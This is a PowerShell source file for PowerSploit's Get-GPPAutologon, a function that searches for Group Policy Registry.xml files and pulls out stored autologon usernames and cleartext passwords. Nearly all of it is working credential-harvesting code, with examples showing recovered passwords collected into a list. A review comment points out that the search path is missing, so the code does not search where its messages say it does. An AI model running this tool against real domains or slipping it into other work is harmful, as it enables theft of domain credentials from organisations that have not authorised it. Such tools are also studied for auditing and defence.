Get-GPPAutologon.ps1 @39f6cef — raw · history · blame
function Get-GPPAutologon
{
<#
.SYNOPSIS
Reports autologon user names and passwords found in Registry.xml files pushed through Group Policy Registry Preferences.

PowerSploit Function: Get-GPPAutologon
Author: Oddvar Moe (@oddvarmoe)
Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION
Get-GPPAutologon is intended to search the domain controller for Registry.xml, parse every match,
and return the autologon username and password. One object is emitted per file that mentions both
DefaultPassword and DefaultUserName; it carries the properties UserNames, File and Passwords.
A field with no value found is reported as '[BLANK]'.

.EXAMPLE
PS C:\> Get-GPPAutologon
UserNames File Passwords
--------- ---- ---------
{administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
{NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}

.EXAMPLE
PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq
password
password12
password123
password1234
password1234$
read123
Recycling*3ftw!

.NOTES
The values come from the Value attribute of the matching Properties elements exactly as stored;
this function performs no decoding. A file reported with a non-blank Passwords value therefore
holds the autologon password in readable form for anyone who can read that file: rotate the
account's password and remove the DefaultPassword item from the preference.

.LINK
https://support.microsoft.com/nb-no/kb/324737
#>
    [CmdletBinding()]
    Param ()

    # Strict mode 2 is pinned because XML handling differs between PowerShell versions.
    Set-StrictMode -Version 2
    [System.Reflection.Assembly]::LoadWithPartialName("System.Core") | Out-Null

    # Helper: parse one preference file and return its autologon fields, if any.
    function Get-GPPInnerFields
    {
        [CmdletBinding()]
        Param (
            $File
        )

        try
        {
            # The leaf name is computed here but never read again in this function.
            $LeafName = Split-Path $File -Leaf
            [xml] $Doc = Get-Content ($File)

            # Collected values; both start out as empty arrays.
            $FoundPasswords = @()
            $FoundUserNames = @()

            # Only files that mention both field names are inspected further.
            $MentionsBoth = ($Doc.innerxml -like "*DefaultPassword*") -and ($Doc.innerxml -like "*DefaultUserName*")
            if (-not $MentionsBoth)
            {
                return
            }

            foreach ($Node in $Doc.GetElementsByTagName("Properties"))
            {
                # The leading comma wraps the element in an array so that the element itself,
                # not its child nodes, is what travels down the pipeline.
                switch ($Node.name)
                {
                    'DefaultPassword'
                    {
                        $FoundPasswords += , $Node | Select-Object -ExpandProperty Value
                    }
                    'DefaultUsername'
                    {
                        $FoundUserNames += , $Node | Select-Object -ExpandProperty Value
                    }
                }
                # Emitted once per Properties element, whether or not it matched.
                Write-Verbose "Potential password in $File"
            }

            # Substitute a visible marker for fields that stayed empty.
            if (-not $FoundPasswords)
            {
                $FoundPasswords = '[BLANK]'
            }
            if (-not $FoundUserNames)
            {
                $FoundUserNames = '[BLANK]'
            }

            # Result object handed back to the caller.
            $Report = New-Object -TypeName PSObject -Property @{
                'Passwords' = $FoundPasswords
                'UserNames' = $FoundUserNames
                'File'      = $File
            }
            Write-Verbose "The password is between {} and may be more than one value."
            if ($Report)
            {
                return $Report
            }
        }
        catch
        {
            Write-Error $Error[0]
        }
    }

    try
    {
        # Require a domain-joined machine and a session that carries a user DNS domain.
        $InDomain = (Get-WmiObject Win32_ComputerSystem).partofdomain
        if (($InDomain -eq $False) -or (-not $Env:USERDNSDOMAIN))
        {
            throw 'Machine is not a domain member or User is not a member of the domain.'
        }

        # Collect every file named Registry.xml.
        Write-Verbose 'Searching the DC. This could take a while.'
        # NOTE(review): no -Path is passed, so the recursion starts at the current location;
        # the verbose text above implies a domain controller share - confirm against upstream.
        $Candidates = Get-ChildItem -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'
        if (-not $Candidates)
        {
            throw 'No preference files found.'
        }

        $CandidateCount = $Candidates | Measure-Object | Select-Object -ExpandProperty Count
        Write-Verbose "Found $CandidateCount files that could contain passwords."

        foreach ($Candidate in $Candidates)
        {
            $Parsed = (Get-GppInnerFields $Candidate.Fullname)
            Write-Output $Parsed
        }
    }
    catch
    {
        Write-Error $Error[0]
    }
}